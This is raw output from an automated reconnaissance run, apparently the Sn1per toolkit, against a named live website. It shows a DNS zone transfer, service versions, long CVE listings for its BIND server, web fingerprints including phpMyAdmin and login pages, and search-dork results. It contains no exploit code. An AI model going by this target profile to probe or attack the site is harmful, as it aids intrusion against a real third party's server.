2648[*] Scanned 1 of 1 hosts (100% complete)
2649[*] Auxiliary module execution completed
#####################################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-20 03:38 EDT
Nmap scan report for idolblog.tv (89.248.174.131)
Host is up (0.24s latency).

PORT STATE SERVICE VERSION
53/tcp open domain ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
|_dns-fuzz: Server didn't response to our probe, can't fuzz
| dns-nsec-enum:
|_ No NSEC records found
| dns-nsec3-enum:
|_ DNSSEC NSEC3 not supported
| dns-nsid:
|_ bind.version: 9.9.4-RedHat-9.9.4-51.el7_4.2
| dns-zone-transfer:
| idolblog.tv. SOA ns1.ecatel.net. hostmaster.idolblog.tv.
| idolblog.tv. MX 10 mail.idolblog.tv.
| idolblog.tv. TXT "v=spf1 a mx ip4:89.248.174.131 ~all"
| idolblog.tv. A 89.248.174.131
| idolblog.tv. NS ns1.ecatel.net.
| idolblog.tv. NS ns2.ecatel.net.
| ftp.idolblog.tv. A 89.248.174.131
| localhost.idolblog.tv. AAAA ::1
| localhost.idolblog.tv. A 127.0.0.1
| mail.idolblog.tv. A 89.248.174.131
| pop.idolblog.tv. A 89.248.174.131
| smtp.idolblog.tv. A 89.248.174.131
| www.idolblog.tv. A 89.248.174.131
|_idolblog.tv. SOA ns1.ecatel.net. hostmaster.idolblog.tv.
| vulners:
| cpe:/a:isc:bind:9.9.4:
| CVE-2015-4620 7.8 https://vulners.com/cve/CVE-2015-4620
| CVE-2014-8500 7.8 https://vulners.com/cve/CVE-2014-8500
| CVE-2017-3141 7.2 https://vulners.com/cve/CVE-2017-3141
| CVE-2015-8461 7.1 https://vulners.com/cve/CVE-2015-8461
| CVE-2013-6230 6.8 https://vulners.com/cve/CVE-2013-6230
| CVE-2015-1349 5.4 https://vulners.com/cve/CVE-2015-1349
| CVE-2018-5740 5.0 https://vulners.com/cve/CVE-2018-5740
| CVE-2017-3145 5.0 https://vulners.com/cve/CVE-2017-3145
| CVE-2016-9131 5.0 https://vulners.com/cve/CVE-2016-9131
| CVE-2016-8864 5.0 https://vulners.com/cve/CVE-2016-8864
| CVE-2016-1286 5.0 https://vulners.com/cve/CVE-2016-1286
| CVE-2015-8000 5.0 https://vulners.com/cve/CVE-2015-8000
| CVE-2017-3143 4.3 https://vulners.com/cve/CVE-2017-3143
| CVE-2017-3142 4.3 https://vulners.com/cve/CVE-2017-3142
| CVE-2017-3136 4.3 https://vulners.com/cve/CVE-2017-3136
| CVE-2016-2775 4.3 https://vulners.com/cve/CVE-2016-2775
| CVE-2016-1285 4.3 https://vulners.com/cve/CVE-2016-1285
| CVE-2018-5741 4.0 https://vulners.com/cve/CVE-2018-5741
| CVE-2016-6170 4.0 https://vulners.com/cve/CVE-2016-6170
|_ CVE-2014-0591 2.6 https://vulners.com/cve/CVE-2014-0591
| vulscan: VulDB - https://vuldb.com:
| [11804] ISC BIND up to 9.9.4 DNS Query bin/named/query.c query_findclosestnsec3() denial of service
| [11104] ISC BIND up to 9.9.4 WSAloctl Winsock API Bypass privilege escalation
| [9764] ISC BIND up to 9.9.4 RDATA rdata.c denial of service
| [119548] ISC BIND 9.9.12/9.10.7/9.11.3/9.12.1-P2 Recursion information disclosure
| [95202] ISC BIND up to 9.9.9-P4/9.10.4-P4/9.11.0-P1 DNSSEC denial of service
| [95201] ISC BIND up to 9.9.9-P4/9.10.4-P4/9.11.0-P1 DS Record Response denial of service
| [95200] ISC BIND up to 9.9.9-P4/9.10.4-P4/9.11.0-P1 ANY Query Response denial of service
| [89850] ISC BIND up to 9.9.9-P1/9.10.4-P1/9.11.0b1 Lightweight Resolution named.conf denial of service
| [81312] ISC BIND up to 9.9.8-P3/9.10.3-P3 named db.c/resolver.c Signature Record denial of service
| [81311] ISC BIND up to 9.9.8-P3/9.10.3-P3 named alist.c/sexpr.c denial of service
| [80787] ISC BIND up to 9.9.8-S4 Query rdataset.c denial of service
| [79802] ISC BIND 9.9.0/9.10.0/9.10.1-P1 Socket Error resolver.c denial of service
| [79801] ISC BIND 9.9.0/9.10.0/9.10.1-P1 Response db.c denial of service
| [76834] ISC BIND up to 9.9.7-P1/9.10.2-P2 TKEY Query Packet Crash denial of service
| [8108] ISC BIND up to 9.9.3 on Unix/Linux Regular Expression denial of service
| [7079] ISC BIND up to 9.9.1 DNS64 IPv6 Transition Mechanism denial of service
| [6295] ISC BIND up to 9.9.1-P2 Assertion Error Resource Record Parser RDATA Query denial of service
| [5875] ISC BIND 9.9.0/9.9.1 denial of service
| [5874] ISC BIND up to 9.9.1-P1 denial of service
| [5483] ISC BIND up to 9.9.1 DNS Resource Record information disclosure
|
| MITRE CVE - https://cve.mitre.org:
| [CVE-2013-4854] The RFC 5011 implementation in rdata.c in ISC BIND 9.7.x and 9.8.x before 9.8.5-P2, 9.8.6b1, 9.9.x before 9.9.3-P2, and 9.9.4b1, and DNSco BIND 9.9.3-S1 before 9.9.3-S1-P1 and 9.9.4-S1b1, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query with a malformed RDATA section that is not properly handled during construction of a log message, as exploited in the wild in July 2013.
| [CVE-2013-3919] resolver.c in ISC BIND 9.8.5 before 9.8.5-P1, 9.9.3 before 9.9.3-P1, and 9.6-ESV-R9 before 9.6-ESV-R9-P1, when a recursive resolver is configured, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for a record in a malformed zone.
| [CVE-2013-2266] libdns in ISC BIND 9.7.x and 9.8.x before 9.8.4-P2, 9.8.5 before 9.8.5b2, 9.9.x before 9.9.2-P2, and 9.9.3 before 9.9.3b2 on UNIX platforms allows remote attackers to cause a denial of service (memory consumption) via a crafted regular expression, as demonstrated by a memory-exhaustion attack against a machine running a named process.
| [CVE-2012-5689] ISC BIND 9.8.x through 9.8.4-P1 and 9.9.x through 9.9.2-P1, in certain configurations involving DNS64 with a Response Policy Zone that lacks an AAAA rewrite rule, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for an AAAA record.
| [CVE-2012-5688] ISC BIND 9.8.x before 9.8.4-P1 and 9.9.x before 9.9.2-P1, when DNS64 is enabled, allows remote attackers to cause a denial of service (assertion failure and daemon exit) via a crafted query.
| [CVE-2012-5166] ISC BIND 9.x before 9.7.6-P4, 9.8.x before 9.8.3-P4, 9.9.x before 9.9.1-P4, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P4 allows remote attackers to cause a denial of service (named daemon hang) via unspecified combinations of resource records.
| [CVE-2012-4244] ISC BIND 9.x before 9.7.6-P3, 9.8.x before 9.8.3-P3, 9.9.x before 9.9.1-P3, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P3 allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for a long resource record.
| [CVE-2012-3868] Race condition in the ns_client structure management in ISC BIND 9.9.x before 9.9.1-P2 allows remote attackers to cause a denial of service (memory consumption or process exit) via a large volume of TCP queries.
| [CVE-2012-1667] ISC BIND 9.x before 9.7.6-P1, 9.8.x before 9.8.3-P1, 9.9.x before 9.9.1-P1, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P1 does not properly handle resource records with a zero-length RDATA section, which allows remote DNS servers to cause a denial of service (daemon crash or data corruption) or obtain sensitive information from process memory via a crafted record.
| [CVE-2011-4313] query.c in ISC BIND 9.0.x through 9.6.x, 9.4-ESV through 9.4-ESV-R5, 9.6-ESV through 9.6-ESV-R5, 9.7.0 through 9.7.4, 9.8.0 through 9.8.1, and 9.9.0a1 through 9.9.0b1 allows remote attackers to cause a denial of service (assertion failure and named exit) via unknown vectors related to recursive DNS queries, error logging, and the caching of an invalid record by the resolver.
| [CVE-2011-2465] Unspecified vulnerability in ISC BIND 9 9.8.0, 9.8.0-P1, 9.8.0-P2, and 9.8.1b1, when recursion is enabled and the Response Policy Zone (RPZ) contains DNAME or certain CNAME records, allows remote attackers to cause a denial of service (named daemon crash) via an unspecified query.
| [CVE-2011-2464] Unspecified vulnerability in ISC BIND 9 9.6.x before 9.6-ESV-R4-P3, 9.7.x before 9.7.3-P3, and 9.8.x before 9.8.0-P4 allows remote attackers to cause a denial of service (named daemon crash) via a crafted UPDATE request.
|
| SecurityFocus - https://www.securityfocus.com/bid/:
| [61774] ISC BIND 9 SRTT Algorithm Authoritative Server Selection Security Vulnerability
| [61479] ISC BIND 9 DNS RDATA Handling CVE-2013-4854 Remote Denial of Service Vulnerability
| [58736] ISC BIND 9 'libdns' Remote Denial of Service Vulnerability
| [57556] ISC BIND 9 DNS64 CVE-2012-5689 Remote Denial of Service Vulnerability
| [56817] ISC BIND 9 DNS64 Remote Denial of Service Vulnerability
| [55852] ISC BIND 9 DNS RDATA Handling CVE-2012-5166 Remote Denial of Service Vulnerability
| [55522] ISC BIND 9 DNS Resource Records Handling CVE-2012-4244 Remote Denial of Service Vulnerability
| [54659] ISC BIND 9 TCP Query Remote Denial of Service Vulnerability
| [54658] ISC BIND 9 DNSSEC Validation CVE-2012-3817 Denial of Service Vulnerability
| [53772] ISC BIND 9 DNS Resource Records Handling Remote Denial of Service Vulnerability
| [50690] ISC BIND 9 Recursive Queries Remote Denial of Service Vulnerability
| [48566] ISC BIND 9 Unspecified Packet Processing Remote Denial of Service Vulnerability
| [48565] ISC BIND 9 RPZ Configurations Remote Denial of Service Vulnerabilities
| [48007] ISC BIND 9 Large RRSIG RRsets Remote Denial of Service Vulnerability
| [47734] ISC BIND 9 RRSIG Query Type Remote Denial of Service Vulnerability
| [46491] ISC BIND 9 IXFR Transfer/DDNS Update Remote Denial of Service Vulnerability
| [45385] ISC BIND 9 DNSSEC Validation Remote Denial of Service Vulnerability
| [45133] ISC BIND 9 'RRSIG' Record Type Negative Cache Remote Denial of Service Vulnerability
| [41730] ISC BIND 9 'RRSIG' Record Type Remote Denial of Service Vulnerability
| [37865] ISC BIND 9 DNSSEC Bogus NXDOMAIN Response Remote Cache Poisoning Vulnerability
| [37118] ISC BIND 9 DNSSEC Query Response Additional Section Remote Cache Poisoning Vulnerability
| [35848] ISC BIND 9 Remote Dynamic Update Message Denial of Service Vulnerability
| [25076] ISC BIND 9 Default ACL Settings Recursive Queries And Cached Content Security Bypass Vulnerability
| [25037] ISC BIND 9 Remote Cache Poisoning Vulnerability
| [4936] ISC BIND 9 Remote Denial Of Service Vulnerability
| [100656] Cisco ASR 920 Series Routers CVE-2017-6795 Local Arbitrary File Overwrite Vulnerability
| [97450] Cisco ASR 903 and ASR 920 Series CVE-2017-6603 Denial of Service Vulnerability
| [93415] Cisco Nexus 9000 Series Switches CVE-2016-1455 Remote Information Disclosure Vulnerability
| [82579] Cisco Nexus 9000 Series ACI Mode Switches CVE-2015-6398 Denial of Service Vulnerability
| [77686] Cisco Firepower 9000 Series CVE-2015-6380 Unspecified OS Command Injection Vulnerability
| [77635] Cisco Firepower 9000 Series CVE-2015-6371 Multiple Arbitrary File Read Vulnerabilities
| [77634] Cisco Firepower 9000 Series CVE-2015-6370 Local Command Injection Vulnerability
| [77633] Cisco Firepower 9000 Series Switches CVE-2015-6372 HTML Injection Vulnerability
| [77631] Cisco Firepower 9000 Series Switches CVE-2015-6374 Clickjacking Vulnerability
| [77629] Cisco Firepower 9000 Series CVE-2015-6369 Local Denial of Service Vulnerability
| [77628] Cisco Firepower 9000 CVE-2015-6373 Cross Site Request Forgery Vulnerability
| [77614] Cisco Firepower 9000 Series Switches CVE-2015-6368 Information Disclosure Vulnerability
| [76913] Cisco NX-OS Software for Nexus 9000 Series Switches CVE-2015-6308 Denial of Service Vulnerability
| [76791] Cisco ASR 9000 Series Aggregation Services Routers CVE-2015-6301 Denial of Service Vulnerability
| [76762] Cisco NX-OS Software for Nexus 9000 Series CVE-2015-6295 Denial of Service Vulnerability
| [76329] Cisco Nexus 9000 Series Software CVE-2015-4301 Remote Denial of Service Vulnerability
| [76057] Cisco Firepower 9000 Series Devices CVE-2015-4287 Information Disclosure Vulnerability
| [75471] Cisco Unified IP Phones 9900 Series CVE-2015-4226 Denial of Service Vulnerability
| [75378] Cisco NX-OS Software for Nexus 9000 Series CVE-2015-4213 Information Disclosure Vulnerability
| [74029] Cisco ASR 9000 Series Routers CVE-2015-0694 Remote Security Bypass Vulnerability
| [73895] Cisco NX-OS Software for Nexus 9000 Series CVE-2015-0686 Denial of Service Vulnerability
| [73470] Cisco ASR 9000 Series Routers CVE-2015-0685 Denial of Service Vulnerability
| [73318] Cisco ASR 9000 Series Aggregation Services Routers CVE-2015-0672 Denial of Service Vulnerability
| [72485] Cisco Unified IP Phones 9900 Series CVE-2015-0604 Arbitrary File Upload Vulnerability
| [72484] Cisco Unified IP Phones 9900 Series CVE-2015-0603 Local Denial of Service Vulnerability
| [72483] Cisco Unified IP Phones 9900 Series CVE-2015-0601 Local Denial of Service Vulnerability
| [72482] Cisco Unified IP Phones 9900 Series CVE-2015-0602 Information Disclosure Vulnerability
| [72481] Cisco Unified IP Phones 9900 Series CVE-2015-0600 Denial of Service Vulnerability
| [71979] Cisco MDS 9000 NX-OS Software CVE-2015-0582 Denial of Service Vulnerability
| [70744] Cisco ASR 901 Series Routers CVE-2014-3293 Denial of Service Vulnerability
| [70658] ZTE ZXDSL 931VII 'manager_dev_config_t.gch' Information Disclosure Vulnerability
| [69057] Cisco Nexus 9000 Series Switches CVE-2014-3330 Access List Security Bypass Vulnerability
| [64770] Cisco Unified IP Phones 9900 Series Crafted Header Unregister Denial of Service Vulnerability
| [63564] Cisco MDS 9000 NX-OS Software VRRP Frames Denial of Service Vulnerability
| [62944] Cisco Unified IP Phones 9900 Series CVE-2013-5532 Buffer Overflow Vulnerability
| [62943] Cisco Unified IP Phones 9900 Series CVE-2013-5533 Local Command Injection Vulnerability
| [62905] Cisco Unified IP Phones 9900 Series CVE-2013-5526 Denial of Service Vulnerability
| [61330] Cisco Unified IP Phones 9900 Series CVE-2013-3426 Arbitrary File Download Vulnerability
| [49633] Oracle Application Server 9i 'httpd.conf' Information Disclosure Vulnerability
| [48811] Cisco ASR 9000 Series Routers IP Version 4 Denial of Service Vulnerability
| [48264] Aastra 9480i CT Multiple Information Disclosure Vulnerabilities
| [15542] NetObjects Fusion 9 Information Disclosure Vulnerability
| [6556] Oracle 9i Application Server Sample Scripts Information Disclosure Vulnerability
| [6459] Oracle 9i Application Server Java Server Page Source Code Disclosure Vulnerability
| [5335] Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
| [4290] Oracle 9i Default Configuration File Information Disclosure Vulnerability
| [4034] Oracle 9IAS OracleJSP Information Disclosure Vulnerability
| [3848] Mandrake Bind 9 Package Insecure File Permissions Vulnerability
| [2516] Microsoft Plus! 98 Windows ME Password Disclosure Vulnerability
|
| IBM X-Force - https://exchange.xforce.ibmcloud.com:
| [85799] Cisco Unified IP Phones 9900 Series directory traversal
| [75412] Cisco Unified IP Phones 9900 series RT privilege escalation
| [68733] Cisco 9000 Series Aggregation Service Router IPv4 packet denial of service
| [9704] Multiple Lucent router UDP port 9 could disclose sensitive information
| [9250] BIND 9 dns_message_findtype() denial of service
| [1852] BIND prior to 4.9.7 buffer overflow affects Digital Firewall 97 users
| [539] Microsoft Windows 95 and Internet Explorer password disclosure
| [86004] ISC BIND RDATA denial of service
| [84767] ISC BIND denial of service
| [83066] ISC BIND denial of service
| [81504] ISC BIND AAAA denial of service
| [80510] ISC BIND DNS64 denial of service
| [79121] ISC BIND queries denial of service
| [78479] ISC BIND RDATA denial of service
| [77185] ISC BIND TCP queries denial of service
| [77184] ISC BIND bad cache denial of service
| [76034] ISC BIND rdata denial of service
| [73053] ISC BIND cache update policy security bypass
| [71332] ISC BIND recursive queries denial of service
| [68375] ISC BIND UPDATE denial of service
| [68374] ISC BIND Response Policy Zones denial of service
| [67665] ISC BIND RRSIG Rrsets denial of service
| [67297] ISC BIND RRSIG denial of service
| [65554] ISC BIND IXFR transfer denial of service
| [63602] ISC BIND allow-query security bypass
| [63596] ISC BIND zone data security bypass
| [63595] ISC BIND RRSIG denial of service
| [62072] ISC BIND DNSSEC query denial of service
| [62071] ISC BIND ACL security bypass
| [61871] ISC BIND anchors denial of service
| [60421] ISC BIND RRSIG denial of service
| [56049] ISC BIND out-of-bailiwick weak security
| [55937] ISC Bind unspecified cache poisoning
| [55753] ISC BIND DNSSEC NSEC/NSEC3 cache poisoning
| [54416] ISC BIND DNSSEC cache poisoning
| [52073] ISC BIND dns_db_findrdataset() denial of service
| [47409] Multiple Mozilla products XBL loadBindingDocument information disclosure
| [45234] ISC BIND UDP denial of service
| [39670] ISC BIND inet_network buffer overflow
| [37233] libgssapi ISC BIND Novell SUSE Linux Enterprise Server GSS-TSIG request denial of service
| [37128] RHSA update for ISC BIND RRset denial of service not installed
| [37127] RHSA update for ISC BIND named service denial of service not installed
| [36275] ISC BIND DNS query spoofing
| [35575] ISC BIND query ID cache poisoning
| [35571] ISC BIND ACL security bypass
| [31838] ISC BIND RRset denial of service
| [31799] ISC BIND named service denial of service
| [29876] HP Tru64 ypbind core dump information disclosure
| [28745] ISC BIND DNSSEC RRset denial of service
| [28744] ISC BIND recursive INSIST denial of service
| [22041] BEA WebLogic Server and Express LDAP anonymous bind information disclosure
| [18836] BIND hostname disclosure
| [10624] ISC BIND DNS stub resolver library (libresolv.a) stack buffer overflows
| [10333] ISC BIND SIG null pointer dereference denial of service
| [10332] ISC BIND OPT resource record (RR) denial of service
| [10304] ISC BIND SIG cached resource records (RR) heap buffer overflow
| [7027] Cisco CBOS Web-based configuration utility binds to port 80 by default
| [5814] ISC BIND "
| [5540] ISC BIND can be remotely crashed by issuing ZXFR requests
| [5462] ISC BIND AXFR host command remote buffer overflow
|
| Exploit-DB - https://www.exploit-db.com:
| [24689] cPanel 9.9.1 -R3 Front Page Extension Installation Information Disclosure
| [23059] Netbula Anyboard 9.9.5 6 Information Disclosure Vulnerability
| [9300] ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC
|
| OpenVAS (Nessus) - http://www.openvas.org:
| [103090] ISC BIND 9 IXFR Transfer/DDNS Update Remote Denial of Service Vulnerability
| [103031] ISC BIND 9 < 9.7.2-P2 Multiple Vulnerabilities
| [103030] ISC BIND 9 'RRSIG' Record Type Negative Cache Remote Denial of Service Vulnerability
| [100717] ISC BIND 9 'RRSIG' Record Type Remote Denial of Service Vulnerability
| [100458] ISC BIND 9 DNSSEC Bogus NXDOMAIN Response Remote Cache Poisoning Vulnerability
| [100362] ISC BIND 9 DNSSEC Query Response Additional Section Remote Cache Poisoning Vulnerability
| [100251] ISC BIND 9 Remote Dynamic Update Message Denial of Service Vulnerability
| [63208] Fedora Core 9 FEDORA-2009-0350 (bind)
| [11226] Oracle 9iAS default error information disclosure
|
| SecurityTracker - https://www.securitytracker.com:
| [1025811] Cisco ASR 9000 Series Router IPv4 Packet Processing Flaw Lets Remote Users Deny Service
| [1012995] BIND 9 Validator Assumption Error May Let Remote Users Deny Service
| [1005048] Oracle Enterprise Manager Web Service Component of Oracle 9i Application Server Discloses the Web Cache Administrator Password to Local Users
| [1003675] Oracle 9iAS Application Server Discloses CGI-BIN Script Source Code to Remote Users
| [1001186] Microsoft Windows Me Operating System and Windows 98 with the Plus! 98 Package Disclose Data Compression Passwords
| [1028901] (McAfee Issues Advisory for McAfee Email Gateway) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
| [1028900] (McAfee Issues Advisory for McAfee Email and Web Security Appliance) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
| [1028899] (McAfee Issues Fix for McAfee Web Gateway) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
| [1028866] (McAfee Issues Fix for McAfee Firewall Enterprise) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
| [1028854] (NetBSD Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
| [1028849] (Red Hat Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
| [1028848] (Red Hat Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
| [1028839] (FreeBSD Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
| [1028838] ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
| [1028632] ISC BIND RUNTIME_CHECK Error Lets Remote Users Deny Service Against Recursive Resolvers
| [1028046] ISC BIND DNS64 and Response Policy Zones (RPZ) Bug Lets Remote Users Deny Service
| [1027835] ISC BIND DNS64 Bug Lets Remote Users Deny Service
| [1027642] ISC BIND RDATA Processing Flaw Lets Remote Users Deny Service
| [1027529] ISC BIND RDATA Processing Flaw Lets Remote Users Deny Service
| [1026647] ISC BIND Cache Update Policy Can Be Bypassed to Allow Revoked Domain Names to Remain Resolvable
| [1026335] ISC BIND Invalid Record Caching Flaw Lets Remote Users Deny Service
| [1025743] ISC BIND Response Policy Zones DNAME/CNAME Processing Flaw Lets Remote Users Deny Service
| [1025742] ISC BIND Packet Processing Flaw Lets Remote Users Deny Service
| [1015850] Samba winbindd Daemon Discloses Server Password to Local Users
| [1003359] BindView NETinventory Discloses Password to Local Users During Auditing
| [1001721] BIND Domain Name System Software May Disclose DNS Transactional Signature (TSIG) Keys to Local Users
|
| OSVDB - http://www.osvdb.org:
| [86219] Cardiac Science G3 Plus 9390A-501 AED AEDUpdate Cleartext Password Local Disclosure
| [22517] MPN HP-180W Wireless IP Phone UDP Port 9090 Information Disclosure
| [22516] ZyXEL P-2000W_v2 VoIP Wi-Fi Phone UDP Port 9090 Information Disclosure
| [21292] ZyXEL P2000W UDP 9090 Remote Information Disclosure
|_
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.18 (90%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 10 hops
Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7

Host script results:
| dns-blacklist:
| SPAM
|_ l2.apews.org - SPAM
| dns-brute:
| DNS Brute-force hostnames:
|_ www.idolblog.tv - 89.248.174.131

TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 176.35 ms 10.247.200.1
2 177.55 ms 213.184.122.97
3 176.56 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
4 176.79 ms bzq-179-124-185.cust.bezeqint.net (212.179.124.185)
5 177.17 ms bzq-179-124-82.cust.bezeqint.net (212.179.124.82)
6 229.95 ms bzq-219-189-6.cablep.bezeqint.net (62.219.189.6)
7 235.06 ms ae0-2.RT.IR9.AMS.NL.retn.net (87.245.232.123)
8 231.40 ms bzq-179-72-242.cust.bezeqint.net (212.179.72.242)
9 239.37 ms ae0-2.RT.IR9.AMS.NL.retn.net (87.245.232.123)
10 239.45 ms 89.248.174.131
###############################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-20 03:38 EDT
Nmap scan report for idolblog.tv (89.248.174.131)
Host is up (0.24s latency).

PORT STATE SERVICE VERSION
80/tcp open ssl/http Apache/2
|_http-server-header: Apache/2
|_http-trane-info: Problem with XML parsing of /evox/about
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.18 (90%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 9 hops

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 170.97 ms 10.247.200.1
2 172.30 ms 213.184.122.97
3 171.24 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
4 171.37 ms bzq-219-189-185.cablep.bezeqint.net (62.219.189.185)
5 233.83 ms bzq-219-189-154.dsl.bezeqint.net (62.219.189.154)
6 234.22 ms linx-224.retn.net (195.66.224.193)
7 227.08 ms bzq-219-189-57.cablep.bezeqint.net (62.219.189.57)
8 233.48 ms bzq-179-72-242.cust.bezeqint.net (212.179.72.242)
9 236.03 ms 89.248.174.131
###################################################################################################################################
http://idolblog.tv [200 OK] Apache[2], Country[NETHERLANDS][NL], Email[sinblogs@protonmail.com], Google-Analytics[Universal][UA-90400338-8], HTML5, HTTPServer[Apache/2], IP[89.248.174.131], MetaGenerator[WordPress 5.2.2], PHP[5.6.35], PoweredBy[Supercounters], Script[text/javascript,text/javascript>], Title[IdolBlog - Daily pictures of gravure idols from Japan.], UncommonHeaders[upgrade,link], WordPress[5.2.2], X-Powered-By[PHP/5.6.35]
###################################################################################################################################################

wig - WebApp Information Gatherer


Scanning http://idolblog.tv...
_____________________ SITE INFO ______________________
IP Title
89.248.174.131 IdolBlog - Daily pictures of gravur

______________________ VERSION _______________________
Name Versions Type
Roundcube CMS
phpMyAdmin CMS
Apache 2 Platform
PHP 5.6.35 Platform

____________________ INTERESTING _____________________
URL Note Type
/readme.html Readme file Interesting
/robots.txt robots.txt index Interesting
/login/ Login Page Interesting

______________________________________________________
Time: 101.8 sec Urls: 444 Fingerprints: 40401
#######################################################################################################################################
HTTP/1.1 200 OK
Date: Sat, 20 Jul 2019 07:42:39 GMT
Server: Apache/2
Upgrade: h2,h2c
Connection: Upgrade
X-Powered-By: PHP/5.6.35
Link: <http://idolblog.tv/wp-json/>; rel="https://api.w.org/"
Vary: User-Agent
Content-Type: text/html; charset=UTF-8

HTTP/1.1 200 OK
Date: Sat, 20 Jul 2019 07:42:40 GMT
Server: Apache/2
Upgrade: h2,h2c
Connection: Upgrade
X-Powered-By: PHP/5.6.35
Link: <http://idolblog.tv/wp-json/>; rel="https://api.w.org/"
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
#############################################################################################################################################
------------------------------------------------------------------------------------------------------------------------

[ ! ] Starting SCANNER INURLBR 2.1 at [20-07-2019 03:43:10]
[ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program

[ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/idolblog.tv/output/inurlbr-idolblog.tv ]
[ INFO ][ DORK ]::[ site:idolblog.tv ]
[ INFO ][ SEARCHING ]:: {
[ INFO ][ ENGINE ]::[ GOOGLE - www.google.sm ]

[ INFO ][ SEARCHING ]::
-[:::]
[ INFO ][ ENGINE ]::[ GOOGLE API ]

[ INFO ][ SEARCHING ]::
-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
[ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.im ID: 003917828085772992913:gmoeray5sa8 ]

[ INFO ][ SEARCHING ]::
-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]

[ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]


 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 0 / 100 ]-[03:43:32] [ - ]
|_[ + ] Target:: [ http://idolblog.tv/ ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
|_[ + ] More details:: / - / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 1 / 100 ]-[03:43:35] [ - ]
|_[ + ] Target:: [ http://idolblog.tv/teensblog/ ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
|_[ + ] More details:: / - / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 2 / 100 ]-[03:43:38] [ - ]
|_[ + ] Target:: [ http://idolblog.tv/idols/ ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
|_[ + ] More details:: / - / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 3 / 100 ]-[03:43:41] [ - ]
|_[ + ] Target:: [ http://idolblog.tv/latinblog/ ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
|_[ + ] More details:: / - / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 4 / 100 ]-[03:43:44] [ - ]
|_[ + ] Target:: [ http://idolblog.tv/wetblog/ ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
|_[ + ] More details:: / - / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 5 / 100 ]-[03:43:46] [ - ]
|_[ + ] Target:: [ http://idolblog.tv/__trashed/ ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
|_[ + ] More details:: / - / , ISP:
|_[ + ] Found:: UNIDENTIFIED

